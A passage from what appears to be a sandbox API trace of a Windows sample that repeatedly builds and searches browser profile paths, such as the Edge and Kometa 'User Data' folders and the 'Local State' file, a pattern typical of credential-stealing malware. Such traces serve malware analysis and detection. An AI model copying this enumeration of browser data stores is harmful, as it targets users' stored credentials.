nFileSizeLow=0x650074, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0207.080] wsprintfA (in: param_1=0x19d2dc, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Edge\\User Data\\*.*") returned 64 [0207.080] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Edge\\User Data\\*.*", lpFindFileData=0x19d194 | out: lpFindFileData=0x19d194*(dwFileAttributes=0x200072, ftCreationTime.dwLowDateTime=0x610044, ftCreationTime.dwHighDateTime=0x610074, ftLastAccessTime.dwLowDateTime=0x4c005c, ftLastAccessTime.dwHighDateTime=0x63006f, ftLastWriteTime.dwLowDateTime=0x6c0061, ftLastWriteTime.dwHighDateTime=0x530020, nFileSizeHigh=0x610074, nFileSizeLow=0x650074, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0207.080] wsprintfA (in: param_1=0x19d2dc, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Edge\\User Data\\*.*") returned 64 [0207.080] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Edge\\User Data\\*.*", lpFindFileData=0x19d194 | out: lpFindFileData=0x19d194*(dwFileAttributes=0x200072, ftCreationTime.dwLowDateTime=0x610044, ftCreationTime.dwHighDateTime=0x610074, ftLastAccessTime.dwLowDateTime=0x4c005c, ftLastAccessTime.dwHighDateTime=0x63006f, ftLastWriteTime.dwLowDateTime=0x6c0061, ftLastWriteTime.dwHighDateTime=0x530020, nFileSizeHigh=0x610074, nFileSizeLow=0x650074, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0207.080] wsprintfA (in: param_1=0x19d2dc, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Edge\\User Data\\*.*") returned 64 [0207.080] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Edge\\User Data\\*.*", lpFindFileData=0x19d194 | out: lpFindFileData=0x19d194*(dwFileAttributes=0x200072, ftCreationTime.dwLowDateTime=0x610044, ftCreationTime.dwHighDateTime=0x610074, ftLastAccessTime.dwLowDateTime=0x4c005c, ftLastAccessTime.dwHighDateTime=0x63006f, ftLastWriteTime.dwLowDateTime=0x6c0061, ftLastWriteTime.dwHighDateTime=0x530020, nFileSizeHigh=0x610074, nFileSizeLow=0x650074, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0207.080] SHGetFolderPathA (in: hwnd=0x0, csidl=32796, hToken=0x0, dwFlags=0x0, pszPath=0x19d51c | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0207.081] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", lpString2="\\Kometa\\User Data" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Kometa\\User Data") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Kometa\\User Data" [0207.081] lstrcatA (in: lpString1="", lpString2="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Kometa\\User Data" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Kometa\\User Data") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Kometa\\User Data" [0207.081] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Kometa\\User Data", lpString2="\\Local State" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Kometa\\User Data\\Local State") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Kometa\\User Data\\Local State" [0207.081] GetFileAttributesA (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Kometa\\User Data\\Local State" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\kometa\\user data\\local state")) returned 0xffffffff [0207.081] wsprintfA (in: param_1=0x19d2ec, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Kometa\\User Data\\*") returned 54 [0207.081] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Kometa\\User Data\\*", lpFindFileData=0x19d1a4 | out: lpFindFileData=0x19d1a4*(dwFileAttributes=0x650074, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0207.081] wsprintfA (in: param_1=0x19d2dc, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Kometa\\User Data\\*.*") returned 56 [0207.081] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Kometa\\User Data\\*.*", lpFindFileData=0x19d194 | out: lpFindFileData=0x19d194*(dwFileAttributes=0x63006f, ftCreationTime.dwLowDateTime=0x6c0061, ftCreationTime.dwHighDateTime=0x530020, ftLastAccessTime.dwLowDateTime=0x610074, ftLastAccessTime.dwHighDateTime=0x650074, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0207.082] wsprintfA (in: param_1=0x19d2dc, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Kometa\\User Data\\*.*") returned 56 [0207.082] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Kometa\\User Data\\*.*", lpFindFileData=0x19d194 | out: lpFindFileData=0x19d194*(dwFileAttributes=0x63006f, ftCreationTime.dwLowDateTime=0x6c0061, ftCreationTime.dwHighDateTime=0x530020, ftLastAccessTime.dwLowDateTime=0x610074, ftLastAccessTime.dwHighDateTime=0x650074, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0207.082] wsprintfA (in: param_1=0x19d2dc, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Kometa\\User Data\\*.*") returned 56 [0207.082] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Kometa\\User Data\\*.*", lpFindFileData=0x19d194 | out: lpFindFileData=0x19d194*(dwFileAttributes=0x63006f, ftCreationTime.dwLowDateTime=0x6c0061, ftCreationTime.dwHighDateTime=0x530020, ftLastAccessTime.dwLowDateTime=0x610074, ftLastAccessTime.dwHighDateTime=0x650074, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0207.082] wsprintfA (in: param_1=0x19d2dc, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Kometa\\User Data\\*.*") returned 56 [0207.082] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Kometa\\User Data\\*.*", lpFindFileData=0x19d194 | out: lpFindFileData=0x19d194*(dwFileAttributes=0x63006f, ftCreationTime.dwLowDateTime=0x6c0061, ftCreationTime.dwHighDateTime=0x530020, ftLastAccessTime.dwLowDateTime=0x610074, ftLastAccessTime.dwHighDateTime=0x650074, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0207.082] wsprintfA (in: param_1=0x19d2dc, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Kometa\\User Data\\*.*") returned 56 [0207.082] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Kometa\\User Data\\*.*", lpFindFileData=0x19d194 | out: lpFindFileData=0x19d194*(dwFileAttributes=0x63006f, ftCreationTime.dwLowDateTime=0x6c0061, ftCreationTime.dwHighDateTime=0x530020, ftLastAccessTime.dwLowDateTime=0x610074, ftLastAccessTime.dwHighDateTime=0x650074, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0207.082] wsprintfA (in: param_1=0x19d2dc, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Kometa\\User Data\\*.*") returned 56 [0207.082] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Kometa\\User Data\\*.*", lpFindFileData=0x19d194 | out: lpFindFileData=0x19d194*(dwFileAttributes=0x63006f, ftCreationTime.dwLowDateTime=0x6c0061, ftCreationTime.dwHighDateTime=0x530020, ftLastAccessTime.dwLowDateTime=0x610074, ftLastAccessTime.dwHighDateTime=0x650074, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0207.083] wsprintfA (in: param_1=0x19d2dc, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Kometa\\User Data\\*.*") returned 56 [0207.083] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Kometa\\User Data\\*.*", lpFindFileData=0x19d194 | out: lpFindFileData=0x19d194*(dwFileAttributes=0x63006f, ftCreationTime.dwLowDateTime=0x6c0061, ftCreationTime.dwHighDateTime=0x530020, ftLastAccessTime.dwLowDateTime=0x610074, ftLastAccessTime.dwHighDateTime=0x650074, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0207.083] wsprintfA (in: param_1=0x19d2dc, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Kometa\\User Data\\*.*") returned 56 [0207.083] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Kometa\\User Data\\*.*", lpFindFileData=0x19d194 | out: lpFindFileData=0x19d194*(dwFileAttributes=0x63006f, ftCreationTime.dwLowDateTime=0x6c0061, ftCreationTime.dwHighDateTime=0x530020, ftLastAccessTime.dwLowDateTime=0x610074, ftLastAccessTime.dwHighDateTime=0x650074, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0207.083] wsprintfA (in: param_1=0x19d2dc, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Kometa\\User Data\\*.*") returned 56 [0207.083] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Kometa\\User Data\\*.*", lpFindFileData=0x19d194 | out: lpFindFileData=0x19d194*(dwFileAttributes=0x63006f, ftCreationTime.dwLowDateTime=0x6c0061, ftCreationTime.dwHighDateTime=0x530020, ftLastAccessTime.dwLowDateTime=0x610074, ftLastAccessTime.dwHighDateTime=0x650074, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0207.083] wsprintfA (in: param_1=0x19d2dc, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Kometa\\User Data\\*.*") returned 56 [0207.083] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Kometa\\User Data\\*.*", lpFindFileData=0x19d194 | out: lpFindFileData=0x19d194*(dwFileAttributes=0x63006f, ftCreationTime.dwLowDateTime=0x6c0061, ftCreationTime.dwHighDateTime=0x530020, ftLastAccessTime.dwLowDateTime=0x610074, ftLastAccessTime.dwHighDateTime=0x650074, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0207.083] wsprintfA (in: param_1=0x19d2dc, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Kometa\\User Data\\*.*") returned 56 [0207.083] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Kometa\\User Data\\*.*", lpFindFileData=0x19d194 | out: lpFindFileData=0x19d194*(dwFileAttributes=0x63006f, ftCreationTime.dwLowDateTime=0x6c0061, ftCreationTime.dwHighDateTime=0x530020, ftLastAccessTime.dwLowDateTime=0x610074, ftLastAccessTime.dwHighDateTime=0x650074, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0207.083] wsprintfA (in: param_1=0x19d2dc, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Kometa\\User Data\\*.*") returned 56 [0207.083] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Kometa\\User Data\\*.*", lpFindFileData=0x19d194 | out: lpFindFileData=0x19d194*(dwFileAttributes=0x63006f, ftCreationTime.dwLowDateTime=0x6c0061, ftCreationTime.dwHighDateTime=0x530020, ftLastAccessTime.dwLowDateTime=0x610074, ftLastAccessTime.dwHighDateTime=0x650074, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0207.084] wsprintfA (in: param_1=0x19d2dc, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Kometa\\User Data\\*.*") returned 56 [0207.084] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Kometa\\User Data\\*.*", lpFindFileData=0x19d194 | out: lpFindFileData=0x19d194*(dwFileAttributes=0x63006f, ftCreationTime.dwLowDateTime=0x6c0061, ftCreationTime.dwHighDateTime=0x530020, ftLastAccessTime.dwLowDateTime=0x610074, ftLastAccessTime.dwHighDateTime=0x650074, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0207.084] wsprintfA (in: param_1=0x19d2dc, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Kometa\\User Data\\*.*") returned 56 [0207.084] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Kometa\\User Data\\*.*", lpFindFileData=0x19d194 | out: lpFindFileData=0x19d194*(dwFileAttributes=0x63006f, ftCreationTime.dwLowDateTime=0x6c0061, ftCreationTime.dwHighDateTime=0x530020, ftLastAccessTime.dwLowDateTime=0x610074, ftLastAccessTime.dwHighDateTime=0x650074, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0207.084] wsprintfA (in: param_1=0x19d2dc, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Kometa\\User Data\\*.*") returned 56 [0207.084] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Kometa\\User Data\\*.*", lpFindFileData=0x19d194 | out: lpFindFileData=0x19d194*(dwFileAttributes=0x63006f, ftCreationTime.dwLowDateTime=0x6c0061, ftCreationTime.dwHighDateTime=0x530020, ftLastAccessTime.dwLowDateTime=0x610074, ftLastAccessTime.dwHighDateTime=0x650074, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0207.084] wsprintfA (in: param_1=0x19d2dc, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Kometa\\User Data\\*.*") returned 56 [0207.084] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Kometa\\User Data\\*.*", lpFindFileData=0x19d194 | out: lpFindFileData=0x19d194*(dwFileAttributes=0x63006f, ftCreationTime.dwLowDateTime=0x6c0061, ftCreationTime.dwHighDateTime=0x530020, ftLastAccessTime.dwLowDateTime=0x610074, ftLastAccessTime.dwHighDateTime=0x650074, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0207.085] wsprintfA (in: param_1=0x19d2dc, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Kometa\\User Data\\*.*") returned 56 [0207.085] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Kometa\\User Data\\*.*", lpFindFileData=0x19d194 | out: lpFindFileData=0x19d194*(dwFileAttributes=0x63006f, ftCreationTime.dwLowDateTime=0x6c0061, ftCreationTime.dwHighDateTime=0x530020, ftLastAccessTime.dwLowDateTime=0x610074, ftLastAccessTime.dwHighDateTime=0x650074, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0207.085] wsprintfA (in: param_1=0x19d2dc, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Kometa\\User Data\\*.*") returned 56 [0207.085] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Kometa\\User Data\\*.*", lpFindFileData=0x19d194 | out: lpFindFileData=0x19d194*(dwFileAttributes=0x63006f, ftCreationTime.dwLowDateTime=0x6c0061, ftCreationTime.dwHighDateTime=0x530020, ftLastAccessTime.dwLowDateTime=0x610074, ftLastAccessTime.dwHighDateTime=0x650074, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0207.085] wsprintfA (in: param_1=0x19d2dc, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Kometa\\User Data\\*.*") returned 56 [0207.085] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Kometa\\User Data\\*.*", lpFindFileData=0x19d194 | out: lpFindFileData=0x19d194*(dwFileAttributes=0x63006f, ftCreationTime.dwLowDateTime=0x6c0061, ftCreationTime.dwHighDateTime=0x530020, ftLastAccessTime.dwLowDateTime=0x610074, ftLastAccessTime.dwHighDateTime=0x650074, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0207.085] wsprintfA (in: param_1=0x19d2dc, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Kometa\\User Data\\*.*") returned 56 [0207.085] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Kometa\\User Data\\*.*", lpFindFileData=0x19d194 | out: lpFindFileData=0x19d194*(dwFileAttributes=0x63006f, ftCreationTime.dwLowDateTime=0x6c0061, ftCreationTime.dwHighDateTime=0x530020, ftLastAccessTime.dwLowDateTime=0x610074, ftLastAccessTime.dwHighDateTime=0x650074, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0207.085] wsprintfA (in: param_1=0x19d2dc, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Kometa\\User Data\\*.*") returned 56 [0207.085] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Kometa\\User Data\\*.*", lpFindFileData=0x19d194 | out: lpFindFileData=0x19d194*(dwFileAttributes=0x63006f, ftCreationTime.dwLowDateTime=0x6c0061, ftCreationTime.dwHighDateTime=0x530020, ftLastAccessTime.dwLowDateTime=0x610074, ftLastAccessTime.dwHighDateTime=0x650074, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0207.085] wsprintfA (in: param_1=0x19d2dc, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Kometa\\User Data\\*.*") returned 56 [0207.085] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Kometa\\User Data\\*.*", lpFindFileData=0x19d194 | out: lpFindFileData=0x19d194*(dwFileAttributes=0x63006f, ftCreationTime.dwLowDateTime=0x6c0061, ftCreationTime.dwHighDateTime=0x530020, ftLastAccessTime.dwLowDateTime=0x610074, ftLastAccessTime.dwHighDateTime=0x650074, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0207.085] wsprintfA (in: param_1=0x19d2dc, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Kometa\\User Data\\*.*") returned 56 [0207.086] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Kometa\\User Data\\*.*", lpFindFileData=0x19d194 | out: lpFindFileData=0x19d194*(dwFileAttributes=0x63006f, ftCreationTime.dwLowDateTime=0x6c0061, ftCreationTime.dwHighDateTime=0x530020, ftLastAccessTime.dwLowDateTime=0x610074, ftLastAccessTime.dwHighDateTime=0x650074, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0207.086] wsprintfA (in: param_1=0x19d2dc, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Kometa\\User Data\\*.*") returned 56 [0207.086] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Kometa\\User Data\\*.*", lpFindFileData=0x19d194 | out: lpFindFileData=0x19d194*(dwFileAttributes=0x63006f, ftCreationTime.dwLowDateTime=0x6c0061, ftCreationTime.dwHighDateTime=0x530020, ftLastAccessTime.dwLowDateTime=0x610074, ftLastAccessTime.dwHighDateTime=0x650074, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0207.086] wsprintfA (in: param_1=0x19d2dc, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Kometa\\User Data\\*.*") returned 56 [0207.086] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Kometa\\User Data\\*.*", lpFindFileData=0x19d194 | out: lpFindFileData=0x19d194*(dwFileAttributes=0x63006f, ftCreationTime.dwLowDateTime=0x6c0061, ftCreationTime.dwHighDateTime=0x530020, ftLastAccessTime.dwLowDateTime=0x610074, ftLastAccessTime.dwHighDateTime=0x650074, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0207.086] wsprintfA (in: param_1=0x19d2dc, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Kometa\\User Data\\*.*") returned 56 [0207.086] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Kometa\\User Data\\*.*", lpFindFileData=0x19d194 | out: lpFindFileData=0x19d194*(dwFileAttributes=0x63006f, ftCreationTime.dwLowDateTime=0x6c0061, ftCreationTime.dwHighDateTime=0x530020, ftLastAccessTime.dwLowDateTime=0x610074, ftLastAccessTime.dwHighDateTime=0x650074, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0207.086] wsprintfA (in: param_1=0x19d2dc, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Kometa\\User Data\\*.*") returned 56 [0207.086] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Kometa\\User Data\\*.*", lpFindFileData=0x19d194 | out: lpFindFileData=0x19d194*(dwFileAttributes=0x63006f, ftCreationTime.dwLowDateTime=0x6c0061, ftCreationTime.dwHighDateTime=0x530020, ftLastAccessTime.dwLowDateTime=0x610074, ftLastAccessTime.dwHighDateTime=0x650074, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0207.086] wsprintfA (in: param_1=0x19d2dc, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Kometa\\User Data\\*.*") returned 56 [0207.086] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Kometa\\User Data\\*.*", lpFindFileData=0x19d194 | out: lpFindFileData=0x19d194*(dwFileAttributes=0x63006f, ftCreationTime.dwLowDateTime=0x6c0061, ftCreationTime.dwHighDateTime=0x530020, ftLastAccessTime.dwLowDateTime=0x610074, ftLastAccessTime.dwHighDateTime=0x650074, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0207.086] wsprintfA (in: param_1=0x19d2dc, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Kometa\\User Data\\*.*") returned 56 [0207.086] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Kometa\\User Data\\*.*", lpFindFileData=0x19d194 | out: lpFindFileData=0x19d194*(dwFileAttributes=0x63006f, ftCreationTime.dwLowDateTime=0x6c0061, ftCreationTime.dwHighDateTime=0x530020, ftLastAccessTime.dwLowDateTime=0x610074, ftLastAccessTime.dwHighDateTime=0x650074, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, 